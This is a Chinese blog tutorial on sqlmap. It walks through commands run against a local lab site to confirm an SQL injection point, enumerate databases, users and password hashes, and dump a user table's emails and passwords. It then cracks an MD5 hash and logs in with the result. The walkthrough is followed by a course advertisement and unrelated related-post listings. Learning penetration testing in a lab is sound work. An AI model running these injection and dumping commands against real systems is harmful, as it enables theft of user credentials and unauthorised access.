渗透测试工具sqlmap基础教程_sqlmap使用方式

于 2024-08-26 16:09:13 发布
阅读量558 收藏 14
点赞数 22
文章标签: 测试工具 网络安全 web安全 面试 学习 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Spontaneous_0/article/details/141566744
版权

-----------------------------

本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。

>

>

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。

既然本文是基础教程,以下只写工具的基本使用方法。

本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org

测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

教程开始:

一、检测注入点是否可用

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

参数:

-u:指定注入点url

结果:

注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:

–dbs:dbs前面有两条杠,请看清楚。

结果:

结果显示该sqlserver中共包含7个可用的数据库。

三、web当前使用的数据库

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

四、web数据库使用账户

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

五、列出sqlserver所有用户

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

六、数据库账户与密码

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

七、列出数据库中的表

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:

-D:指定数据库名称

–tables:列出表

结果:

结果体现共列出了34张表。

八、列出表中字段

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

–columns:指定列出字段

结果:

结果显示该userb表中包含了23条字段。

九、暴字段内容

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

–dump:将结果导出

结果:

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

–start:指定开始的行

–stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

十、验证结果

通过上图结果看到其中的一个用户信息为:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

拿到账号密码我们来测试是否可以登录,登录结果如下:

验证成功!

-----------------

网络安全学习路线

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

或者扫描下方csdn官方合作二维码获取哦!

在这里插入图片描述

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

阶段一:基础入门

img

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完年薪15w+没有问题

阶段二:技术进阶(到了这一步你才算入门)

img

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容可在文章后方领取。

在这里插入图片描述

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

或者扫描下方csdn官方合作二维码获取哦!

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

感谢您观看我的文章,谢谢!!

网络安全乔妮娜
关注
  • 22
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
Windows下Sqlmap环境安装教程详解
09-16
Sqlmap作为一款强大的自动化渗透测试工具,被广泛应用于SQL注入漏洞的发现与利用。对于Windows用户而言,如何在本地环境中顺利安装并配置Sqlmap成为了一个关键问题。本文将详细介绍在Windows环境下安装Sqlmap的过程...
渗透测试工具burpsuite详细使用教程
02-02
例如,使用它测试Web Services服务,自动化SQL注入渗透测试,结合Sqlmap进行漏洞验证,以及利用PhantomJS进行跨站脚本(XSS)的检测。此外,我们还能通过Burp Suite、Android Killer对Android应用程序进行渗透测试。 ...
基于springmvc实现文件上传
a1241436267的博客
08-20 397
【代码】基于springmvc实现文件上传。
MVC 参考手册
lly202406的博客
08-21 465
MVC(Model-View-Controller)是一种广泛使用的软件架构模式,它将应用程序的逻辑分为三个相互关联的组件:模型(Model)、视图(View)和控制器(Controller)。这种模式最早在20世纪70年代被提出,用于Smalltalk编程语言中,后来被广泛采用于各种编程语言和框架中,如Java的Spring框架、.NET框架以及Python的Django等。本文档旨在提供一个关于MVC模式的全面参考,包括其原理、组件、优点、缺点以及在现代软件开发中的应用。
SpringMVC 中的常用注解和用法
qq_73017178的博客
08-22 732
SpringMVC 中的常用注解和用法:1.@RequestMapping2.@RequestParam3.@RequestBody4.@PathVariable 5.@RestController(返回页面)6.@Controller(返回视图)7.@CookieValue8.@SessionAttribute
【Java日志系列】Log4j2日志框架
记录了个人在学习生活中的所思所想,在反思自己的同时希望也能够帮到你
08-23 808
在当今的软件开发领域中,日志记录是调试、监控和审计应用程序不可或缺的一部分。高效的日志记录不仅能帮助开发者理解程序的运行流程,还能在运行时出现问题时提供重要的线索。Apache Log4j 2 是一款广受欢迎的日志框架,它在 Log4j 1.x 的基础上进行了重大改进,并且相较于其他流行的框架如 Logback 也提供了更多的优化。本文旨在介绍 Log4j 2 的主要特点和如何使用它来增强应用程序的日志能力。
Pytest框架直接右键运行 testcase.py,不执行最外层conftest
weixin_57632548的博客
08-22 329
Pytest 框架结构如下:TestCases:Instanta:# 当直接右键直接 运行 test_instanta_tcpdump_pack_len.py 时,只运行Instanta\conftest.py,不运行 TestCases\conftest.py.
如何使用Pytest进行自动化测试
百晓生说测试的博客
08-21 1077
为什么需要自动化测试自动化测试有很多优点,但这里有3个主要的点成熟的、功能齐全的Python测试工具——pytest目前有多种可用的测试框架和工具。这些框架的风格也各不相同,比如数据驱动、关键字驱动、混合、BDD等等。您可以选择最适合您的要求。Python和pytest在这场竞争中占据了巨大的份额。Python及其相关工具之所以被大量使用,可能是因为与其他语言相比,没有或很少编程经验的人更能负担得起它们。pytest框架使得编写小型测试变得很容易,但是可以扩展到支持应用程序和库的复杂功能测试。
学习之appium的简单使用
qq_42792477的博客
08-21 471
4、安装(建议选择给自己安装不给所有用户appium:https://blog.csdn.net/qq_42792477/article/details/141386021?3、安装SDk(安卓篇):https://blog.csdn.net/qq_42792477/article/details/141387366?2、安装nodejs:https://blog.csdn.net/qq_42792477/article/details/141363957?
你知道有哪些Spring MVC扩展点可以解析接口参数和处理返回值吗?
weixin_41821642的博客
08-22 588
Spring MVC是一个灵活且强大的框架,它允许开发者在框架的基础上进行深度定制,以满足各种复杂的业务需求。和是Spring MVC提供的两个重要扩展点,分别用于处理控制器方法的参数解析和返回值处理。本文将详细探讨这两个接口的作用、使用场景以及如何自定义实现。关于Spring MVC谈谈@ControllerAdvice的使用及其实现原理:用于定义全局的异常处理、数据绑定、数据预处理等功能。
3 pytest Fixture
Sally_xy的博客
08-21 698
fixture 中 yield 之前的代码 --> 测试函数 --> fixture 中 yield 之后的代码。使用 fixture 的优势在于:用户在编写函数时可以只考虑核心测试逻辑,而无需考虑测试前的准备工作。fixture 可放在单独的测试文件中,也可在放在某公共目录下的 conftest.py 文件中供。使用 fixture,除了以上在测试函数参数列表中指定 fixture 外,也可以用。使用参数化 fixture,每个使用该 fixture 的测试函数都可以被运行多次。下的多个测试文件共享。
java日常管理
happy_king_zi的博客
08-23 472
GC(Garbage Collection)内存自动管理极速:内存垃圾自动回收技术[内存的分配和释放]
Python测试框架之—— pytest介绍与示例
最新发布
oscar999的专栏
08-25 649
Pytest是一个功能强大且易于使用的Python测试框架,它提供了丰富的功能和灵活的用法,使得编写和运行测试变得简单而高效。
Spring MVC域对象共享数据
好看的皮囊千篇一律,有趣的灵魂万里挑一。
08-21 905
在Spring MVC中,域对象(Domain Object)通常指的是与业务逻辑相关的模型对象,它们代表了应用程序中的核心数据结构。例如,在一个电商应用中,Product、User、Order等类可以被视为域对象。这些对象通常与数据库中的表相对应,并包含业务逻辑和数据验证等功能。
Spring MVC图解
weixin_44356698的博客
08-22 322
DispatcherServlet(前端控制器) 作用:DispatcherServlet 是Spring MVC的前端控制器,它负责接收所有的请求并分发给相应的处理器。 流程:在图中,所有的请求首先到达 DispatcherServlet。 HandlerMapping(处理器映射器) 作用:HandlerMapping 的职责是根据请求的URL找到对应的处理器(Controller)和任何预处理或后处理操作。 流程:在图中,DispatcherServlet 通过 HandlerMapping 确定
@SpringBootTest单元测试中报错:无法自动装配,找不到 ‘XXX‘ 类型的 Bean
qq_61551948的博客
08-22 335
@SpringBootTest单元测试中报错:无法自动装配,找不到 'XXX' 类型的 Bean
web.xml动态读取sunspringmvc.xml文件
Sun的个人博客
08-23 468
文章目录1.问题分析1.SunWebApplicationContext.java 中sunspringmvc.xml是写死的2.但是web.xml已经配置了init-param,所以应该是可以读取的2.具体实现1.SunDispatcherServlet.java 得到ServletConfig传递给Spring容器完成初始化2.SunWebApplicationContext.java 读取初始化参数3.测试 1.问题分析 1.SunWebApplicationContext.java 中sunspri
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值